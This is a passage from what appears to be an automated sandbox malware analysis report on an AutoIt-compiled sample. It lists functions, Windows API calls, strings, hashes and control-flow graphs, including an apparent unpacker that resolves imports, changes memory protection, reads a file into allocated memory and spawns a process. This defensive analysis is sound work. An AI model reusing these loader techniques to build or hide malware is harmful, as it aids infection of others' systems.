                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                      • API String ID: 98802146-2727554177
                                      • Opcode ID: 6009649127df3b2a24f4005d9f9a8a0094f1637daee57f0ec2d8106fc343dbcb
                                      • Instruction ID: ef878ea75e2d1aed095ce3e340f9f286a2faed59e060869f9b955bb7923d6416
                                      • Opcode Fuzzy Hash: 6009649127df3b2a24f4005d9f9a8a0094f1637daee57f0ec2d8106fc343dbcb
                                      • Instruction Fuzzy Hash: 3D717F715183019EC714EF6AEC819ABBBE8FF86B41F40442EF545D71A0EB30DA49DB52
                                      Function 00882B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00882B8E
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00882B9D
                                      • LoadIconW.USER32(00000063), ref: 00882BB3
                                      • LoadIconW.USER32(000000A4), ref: 00882BC5
                                      • LoadIconW.USER32(000000A2), ref: 00882BD7
                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00882BEF
                                      • RegisterClassExW.USER32(?), ref: 00882C40
                                        • Part of subcall function 00882CD4: GetSysColorBrush.USER32(0000000F), ref: 00882D07
                                        • Part of subcall function 00882CD4: RegisterClassExW.USER32(00000030), ref: 00882D31
                                        • Part of subcall function 00882CD4: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00882D42
                                        • Part of subcall function 00882CD4: LoadIconW.USER32(000000A9), ref: 00882D85
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 2880975755-4155596026
                                      • Opcode ID: eb55fb7a55786c3bf3fc5813622340c88480822fbadde941128e4f0ffc60b175
                                      • Instruction ID: af5270951c1c09eb049e6fc5a1dc2a938bf28d465a5477b909df4a8d6858e11a
                                      • Opcode Fuzzy Hash: eb55fb7a55786c3bf3fc5813622340c88480822fbadde941128e4f0ffc60b175
                                      • Instruction Fuzzy Hash: A1216FB4E68318AFDB109FA6EC65BED7FB4FB08B51F00415AF500A66A0D3B10940EF90
                                      Function 00882CD4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00882D07
                                      • RegisterClassExW.USER32(00000030), ref: 00882D31
                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00882D42
                                      • LoadIconW.USER32(000000A9), ref: 00882D85
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 975902462-1005189915
                                      • Opcode ID: 24b51536be07406fe832f1b2b30246bce656d7d829a97fe9934dc9edfaee302d
                                      • Instruction ID: cc8700d5c8826271a28463271080ea3b78c7ac9e5666311dca1e63aa0d47bc6d
                                      • Opcode Fuzzy Hash: 24b51536be07406fe832f1b2b30246bce656d7d829a97fe9934dc9edfaee302d
                                      • Instruction Fuzzy Hash: 5921C4B5E65318AFDB00DFA5EC59BDDBBB4FB08701F00811AF511A62A0D7B14644EF91
                                      Function 01392B18 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 502 1392b18-1392b6a call 1392a18 CreateFileW 505 1392b6c-1392b6e 502->505 506 1392b73-1392b80 502->506 507 1392ccc-1392cd0 505->507 509 1392b93-1392baa VirtualAlloc 506->509 510 1392b82-1392b8e 506->510 511 1392bac-1392bae 509->511 512 1392bb3-1392bd9 CreateFileW 509->512 510->507 511->507 513 1392bdb-1392bf8 512->513 514 1392bfd-1392c17 ReadFile 512->514 513->507 516 1392c19-1392c36 514->516 517 1392c3b-1392c3f 514->517 516->507 519 1392c41-1392c5e 517->519 520 1392c60-1392c77 WriteFile 517->520 519->507 521 1392c79-1392ca0 520->521 522 1392ca2-1392cc7 CloseHandle VirtualFree 520->522 521->507 522->507
                                      APIs
                                      • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01392B5D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                      • Instruction ID: 0fbcb47d5d6c47dc0259cd01a31d12feff8542376c25cfc2e29734d61fa0d754
                                      • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                      • Instruction Fuzzy Hash: EA512875A50249FBEF20DFE4CC49FDF77B8AF48705F108954F60AEA280DA7496408B60
                                      Function 00882C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 542 882c63-882cd3 CreateWindowExW * 2 ShowWindow * 2
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00882C91
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00882CB2
                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00881CAD,?), ref: 00882CC6
                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00881CAD,?), ref: 00882CCF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: 1003a25a081451e6539d06d4bc934639b9ce5211156f9066a485d26bf196fa29
                                      • Instruction ID: cf46db15b523e638dfb985015c25a4aa9f62fc3352821d3ef64daaec5f796173
                                      • Opcode Fuzzy Hash: 1003a25a081451e6539d06d4bc934639b9ce5211156f9066a485d26bf196fa29
                                      • Instruction Fuzzy Hash: 87F03AB56A53947AEB300713AC18FB72EBDD7C6F61F01401AF900A21B0C2710840EBB0
                                      Function 009E1740 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 657 9e1740-9e174d 658 9e175a-9e175f 657->658 659 9e1761 658->659 660 9e1763 659->660 661 9e1750-9e1755 659->661 663 9e1768-9e176a 660->663 662 9e1756-9e1758 661->662 662->658 662->659 664 9e176c-9e1771 663->664 665 9e1773-9e1777 663->665 664->665 666 9e1779 665->666 667 9e1784-9e1787 665->667 670 9e177b-9e1782 666->670 671 9e17a3-9e17a8 666->671 668 9e1789-9e178e 667->668 669 9e1790-9e1792 667->669 668->669 669->663 670->667 670->671 672 9e17aa-9e17b3 671->672 673 9e17bb-9e17bd 671->673 674 9e182a-9e182d 672->674 675 9e17b5-9e17b9 672->675 676 9e17bf-9e17c4 673->676 677 9e17c6 673->677 678 9e1832-9e1835 674->678 675->677 676->677 679 9e17c8-9e17cb 677->679 680 9e1794-9e1796 677->680 683 9e1837-9e1839 678->683 684 9e17cd-9e17d2 679->684 685 9e17d4 679->685 681 9e179f-9e17a1 680->681 682 9e1798-9e179d 680->682 686 9e17f5-9e1804 681->686 682->681 683->678 687 9e183b-9e183e 683->687 684->685 685->680 688 9e17d6-9e17d8 685->688 689 9e1806-9e180d 686->689 690 9e1814-9e1821 686->690 687->678 691 9e1840-9e185c 687->691 692 9e17da-9e17df 688->692 693 9e17e1-9e17e5 688->693 689->689 695 9e180f 689->695 690->690 696 9e1823-9e1825 690->696 691->683 697 9e185e 691->697 692->693 693->688 694 9e17e7 693->694 698 9e17e9-9e17f0 694->698 699 9e17f2 694->699 695->662 696->662 700 9e1864-9e1868 697->700 698->688 698->699 699->686 701 9e18af-9e18b2 700->701 702 9e186a-9e1880 LoadLibraryA 700->702 704 9e18b5-9e18bc 701->704 703 9e1881-9e1886 702->703 703->700 705 9e1888-9e188a 703->705 706 9e18be-9e18c0 704->706 707 9e18e0-9e1910 VirtualProtect * 2 704->707 708 9e188c-9e1892 705->708 709 9e1893-9e18a0 GetProcAddress 705->709 710 9e18c2-9e18d1 706->710 711 9e18d3-9e18de 706->711 712 9e1914-9e1918 707->712 708->709 713 9e18a9 ExitProcess 709->713 714 9e18a2-9e18a7 709->714 710->704 711->710 712->712 715 9e191a 712->715 714->703
                                      APIs
                                      • LoadLibraryA.KERNEL32(?), ref: 009E187A
                                      • GetProcAddress.KERNEL32(?,009DAFF9), ref: 009E1898
                                      • ExitProcess.KERNEL32(?,009DAFF9), ref: 009E18A9
                                      • VirtualProtect.KERNELBASE(00880000,00001000,00000004,?,00000000), ref: 009E18F7
                                      • VirtualProtect.KERNELBASE(00880000,00001000), ref: 009E190C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                      • String ID:
                                      • API String ID: 1996367037-0
                                      • Opcode ID: 5a8d042e5e27860157fadb7ea2481988c52a49fe851f5a1a2fd010086ffc2805
                                      • Instruction ID: b99e836c935a0ce724d73ec076a68ebc622bb74e59af9a1d3ef12bc606f13e4e
                                      • Opcode Fuzzy Hash: 5a8d042e5e27860157fadb7ea2481988c52a49fe851f5a1a2fd010086ffc2805
                                      • Instruction Fuzzy Hash: 6E5127B2A543D24BD7229EB9DCC06B0B798EB5172072C0B39D9E6C73C6E7B45C098760
                                      Function 013945D8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 716 13945d8-1394703 call 13921f8 call 13944c8 CreateFileW 723 139470a-139471a 716->723 724 1394705 716->724 727 139471c 723->727 728 1394721-139473b VirtualAlloc 723->728 725 13947d7-13947dc 724->725 727->725 729 139473d 728->729 730 1394742-1394759 ReadFile 728->730 729->725 731 139475b 730->731 732 139475d-1394772 call 1393268 730->732 731->725 734 1394777-13947b1 call 1394508 call 13934c8 732->734 739 13947cd-13947d5 734->739 740 13947b3-13947c8 call 1394558 734->740 739->725 740->739
                                      APIs
                                        • Part of subcall function 013944C8: Sleep.KERNELBASE(000001F4), ref: 013944D9
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013946F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateFileSleep
                                      • String ID: TOC09AQDNAC9D9WL
                                      • API String ID: 2694422964-1361438446
                                      • Opcode ID: d39d8dc12139e5fa335de783a3c339fa066d5a891c35989cd7decd9d29a71087
                                      • Instruction ID: 531c4be8d7f617056bcf6b6aaa18b462d8e8527ed97d152227e737878081788a
                                      • Opcode Fuzzy Hash: d39d8dc12139e5fa335de783a3c339fa066d5a891c35989cd7decd9d29a71087
                                      • Instruction Fuzzy Hash: 1D518E71D1424DEBEF11DBE8C814BEEBB79AF15304F004199E618BB2C0D6B91B49CBA5
                                      Function 00883B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 779 883b1c-883b27 780 883b99-883b9b 779->780 781 883b29-883b2e 779->781 783 883b8c-883b8f 780->783 781->780 782 883b30-883b48 RegOpenKeyExW 781->782 782->780 784 883b4a-883b69 RegQueryValueExW 782->784 785 883b6b-883b76 784->785 786 883b80-883b8b RegCloseKey 784->786 787 883b78-883b7a 785->787 788 883b90-883b97 785->788 786->783 789 883b7e 787->789 788->789 789->786
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00883B0F,SwapMouseButtons,00000004,?), ref: 00883B40
                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00883B0F,SwapMouseButtons,00000004,?), ref: 00883B61
                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00883B0F,SwapMouseButtons,00000004,?), ref: 00883B83
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 3677997916-824357125
                                      • Opcode ID: 7474fa0dcbb12aa6cce67d9f7524ede0d804ccac604ec1ffb3d6b0bd3193b6b8
                                      • Instruction ID: e032a7eb7584eac7938e95a5ec572ad06d466b03e25b951d9781c21c97db7dc1
                                      • Opcode Fuzzy Hash: 7474fa0dcbb12aa6cce67d9f7524ede0d804ccac604ec1ffb3d6b0bd3193b6b8
                                      • Instruction Fuzzy Hash: AB112AB5620208FFDB20DFA5DC44AEEB7B8FF05B94B108459A805D7110E2319F40A760
                                      Function 0088DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                      Download Yara Rule
                                      Strings
                                      • Variable must be of type 'Object'., xrefs: 008D32B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Variable must be of type 'Object'.
                                      • API String ID: 0-109567571
                                      • Opcode ID: e221aaf250a6dc2f7173ecbf6a447b84840a08ad2766333107caa7c792489ffb
                                      • Instruction ID: 444ff8a86c3d8e396e397e8a940cc4ce051a8fb51b6c480d42edea31f7cc2746
                                      • Opcode Fuzzy Hash: e221aaf250a6dc2f7173ecbf6a447b84840a08ad2766333107caa7c792489ffb
                                      • Instruction Fuzzy Hash: 75C2AD71A00219CFCB24EF58C880AADB7B1FF19314F24856AE956EB391D375ED41CB92
                                      Function 00883923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1300 883923-883939 1301 88393f-883954 call 886270 1300->1301 1302 883a13-883a17 1300->1302 1305 88395a-883976 call 886b57 1301->1305 1306 8c3393-8c33a2 LoadStringW 1301->1306 1312 88397c-883980 1305->1312 1313 8c33c9-8c33e5 call 886350 call 883fcf 1305->1313 1308 8c33ad-8c33b6 1306->1308 1310 8c33bc-8c33c4 call 88a8c7 1308->1310 1311 883994-883a0e call 8a2340 call 883a18 call 8a4983 Shell_NotifyIconW call 88988f 1308->1311 1310->1311 1311->1302 1312->1308 1315 883986-88398f call 886350 1312->1315 1313->1311 1326 8c33eb-8c3409 call 8833c6 call 883fcf call 8833c6 1313->1326 1315->1311 1326->1311
                                      APIs
                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008C33A2
                                        • Part of subcall function 00886B57: _wcslen.LIBCMT ref: 00886B6A
                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00883A04
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: IconLoadNotifyShell_String_wcslen
                                      • String ID: Line:
                                      • API String ID: 2289894680-1585850449
                                      • Opcode ID: 2e98fd30f6424de6fe576adb7b16aebd048d2e03ebe28b9fc99318cb93de78e5
                                      • Instruction ID: 92dda882688d04adc7145cbff82025f1e33aedf60e303c42edd4478c303ad8b7
                                      • Opcode Fuzzy Hash: 2e98fd30f6424de6fe576adb7b16aebd048d2e03ebe28b9fc99318cb93de78e5
                                      • Instruction Fuzzy Hash: 3231CE71518304AAD725FB28EC45BEBB7E8FB81B14F00492AF599D2191EB709A49C7C3
                                      Function 0089FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008A0668
                                        • Part of subcall function 008A32A4: RaiseException.KERNEL32(?,?,?,008A068A,?,00951444,?,?,?,?,?,?,008A068A,00881129,00948738,00881129), ref: 008A3304
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008A0685
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$ExceptionRaise
                                      • String ID: Unknown exception
                                      • API String ID: 3476068407-410509341
                                      • Opcode ID: e6f6a231cfc02e226eda68fb7328e1d0e8fdee050910e16b0beb10a7063a494f
                                      • Instruction ID: 00b63258e11765e73b51b0fc0949697ae677703169afc284603087a7fd438027
                                      • Opcode Fuzzy Hash: e6f6a231cfc02e226eda68fb7328e1d0e8fdee050910e16b0beb10a7063a494f
                                      • Instruction Fuzzy Hash: 11F0FF3490030C639F04B6A8D846D9E776CFE42358B604030B914D2C92EF70EA25CA82
                                      Function 013931F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0139323D
                                      • ExitProcess.KERNEL32(00000000), ref: 0139325C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$CreateExit
                                      • String ID: D
                                      • API String ID: 126409537-2746444292
                                      • Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                      • Instruction ID: fcc97e486e4f18f9854ccbd8c60a7ad6742f8c71bd19fedc6a8518ba3d75e2a5
                                      • Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                      • Instruction Fuzzy Hash: 0DF0ECB554024CABDF60EFE4CD49FEE777CBF44705F408508FA5A9A180DA7496088B61
                                      Function 00907F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 009082F5
                                      • TerminateProcess.KERNEL32(00000000), ref: 009082FC
                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 009084DD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFreeLibraryTerminate
                                      • String ID:
                                      • API String ID: 146820519-0
                                      • Opcode ID: 18b21e3b1bc3588f2fe2e873bbebeea4225aff7befd7e871725d09272bcc9b0b
                                      • Instruction ID: 7d53f9d03bf70cc0e4dbbb3a144b7195219e67d0976ccda763b6ce5a0fe1088f
                                      • Opcode Fuzzy Hash: 18b21e3b1bc3588f2fe2e873bbebeea4225aff7befd7e871725d09272bcc9b0b
                                      • Instruction Fuzzy Hash: 61127B71A083019FC714DF28C484B6ABBE5FF89318F04895DE9998B392DB31E945CF92
                                      Function 008810F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00881BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00881BF4
                                        • Part of subcall function 00881BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00881BFC
                                        • Part of subcall function 00881BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00881C07
                                        • Part of subcall function 00881BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00881C12
                                        • Part of subcall function 00881BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00881C1A
                                        • Part of subcall function 00881BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00881C22
                                        • Part of subcall function 00881B4A: RegisterClipboardFormatW.USER32(00000004), ref: 00881BA2
                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0088136A
                                      • OleInitialize.OLE32 ref: 00881388
                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 008C24AB
                                      Memory Dump Source
